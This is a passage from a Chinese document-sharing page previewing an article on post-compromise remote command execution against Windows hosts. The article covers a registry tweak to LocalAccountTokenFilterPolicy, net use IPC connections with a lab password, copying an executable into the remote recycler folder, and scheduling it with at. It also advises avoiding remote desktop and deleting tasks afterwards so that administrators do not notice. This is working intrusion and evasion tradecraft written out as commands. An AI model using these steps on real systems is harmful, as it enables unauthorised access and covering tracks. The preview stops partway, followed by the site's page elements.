没有合适的资源?快使用搜索试试~ 我知道了~
常见的远程执行命令方式整理
资源推荐
资源详情
资源评论
本文作者:t3st@信安之路
当我们已经获取了远程系统的凭证(明文密码或 hash)时,可以直接通过3389远程
登录进去收集信息、进行下一步的渗透,但是这样做的话会在系统上留下我们的操作
记录,而且有可能邂逅管理员。大部分情况下,一个cmdshell 已经可以满足我们继
续渗透的需求,所以不到万不得已的时候最好不要远程桌面连接(mstsc),而是通过
远程执行命令的方式继续开展工作。本文整理了一些远程执行命令的姿势,测试环境
如下:
C O D E : [ ]
###关于LocalAccountTokenFilterPolicy的说明
在 Windows Vista 以后的操作系统中,LocalAccountTokenFilterPolicy 的默
认值为0,这种情况下内置账户Administrator 进行远程连接时会直接得到具有管理
员凭证的令牌,而非 Administrator 的本地管理员账户进行远程连接(比如 ipc
连接、wmi 连接)时,会得到一个删除了管理员凭证的令牌。域用户不受此影响,也
不在我们讨论的范围内。也就是说只有 Administrator 账号才能建立需要管理员权
限的远程连接,其他本地管理员账户建立需要管理员权限的远程连接时则会提示权限
不足。可以通过以下方法修改远程系统上LocalAccountTokenFilterPolicy 条目的
值,使得非 Administrator 的本地管理员建立连接时也可以得到具有管理员凭证的
令牌,即可正常通过各种方式远程执行命令。
修改 LocalAccountTokenFilterPolicy 为1:
reg add
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system
/v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
远 程 系 统 :
I P :1 9 2 . 1 6 8 .17.13 8
用 户 名 : A d m i n i s t r a t o r
密 码 : ! @ # 1 2 3 Q W E
所 属 本 地 组 : A d m i n i s t r a t o r s
用 户 名 : t e s t
密 码 : ! @ # 1 2 3 Q W E
所 属 本 地 组 : A d m i n i s t r a t o r s 、 U s e r s
恢复 LocalAccountTokenFilterPolicy 为0(删除后需要重启 explorer.exe 才
能使修改生效)
reg delete
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system
/v LocalAccountTokenFilterPolicy /f
###netuse+at
常用命令
建立一个ipc连接
net use \192.168.17.138\C$ "!@#123QWE"
/u:"workgroup\Administrator"
拷贝文件到远程系统上
copy s.exe \192.168.17.138\c$\RECYCLER\
查看远程主机当前时间
net time \192.168.17.138
添加计划任务在远程系统上执行命令
at \192.168.17.138 15:18 cmd.exe /c "ipconfig /all >
c:\programdata\error.log"
添加计划任务在远程系统上执行bat脚本
at \192.168.17.138 15:18 c:\programdata\test.bat
查看at任务列表
at \192.168.17.138
删除at计划任务,运行完成后一定要删除计划任务!
at \192.168.17.138 1 /delete
查看所有ipc连接
net use
剩余8页未读,继续阅读
资源评论
zzkkoo8
- 粉丝: 12
- 资源: 29
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功